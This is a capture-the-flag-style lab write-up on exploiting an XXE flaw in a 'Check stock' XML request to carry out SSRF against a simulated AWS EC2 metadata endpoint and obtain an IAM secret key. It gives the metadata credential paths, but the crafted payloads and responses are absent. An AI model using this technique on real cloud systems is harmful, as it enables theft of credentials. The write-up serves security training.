search

Exploiting XXE to perform SSRF attacks

hashtag
Description

This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response.

The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.

To solve the lab, exploit the XXE vulnerability to perform an SSRF attackarrow-up-right that obtains the server's IAM secret access key from the EC2 metadata endpoint.

hashtag
Approach

After accessing the lab, I quickly identified a POST request that sent XML data to the backend. Here's the request:

POST /product/stock HTTP/2
Host: 0adc00e90446bbab80dc21ad0080005d.web-security-academy.net
Cookie: session=GoXAgdvk2vxaJtE8jsqZdWOXTZlZH1qa
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 ...

<?xml version="1.0" encoding="UTF-8"?>
	<stockCheck>
		<productId>1</productId>
		<storeId>3</storeId>
	</stockCheck>

I attempted to exploit an XXE vulnerability by creating an external entity pointing to an internal system, http://169.254.169.254/. However, I encountered an unexpected response indicating an "Invalid product ID: latest".

Response:

To proceed, I referred to an articlearrow-up-right on exploiting AWS metadata endpoint SSRF vulnerabilities. It mentioned accessing http://169.254.169.254/latest/meta-data/iam/security-credentials/ to steal valid roles. Incorporating this into my payload, I crafted the following request:

Response:

The response revealed that the role name was 'admin'. By accessing http://169.254.169.254/latest/meta-data/iam/security-credentials/admin, I obtained valuable metadata:

Response

By obtaining this information, I successfully solved the lab.

PreviousExploiting XXE using external entities to retrieve filesNextBlind XXE with out of band interaction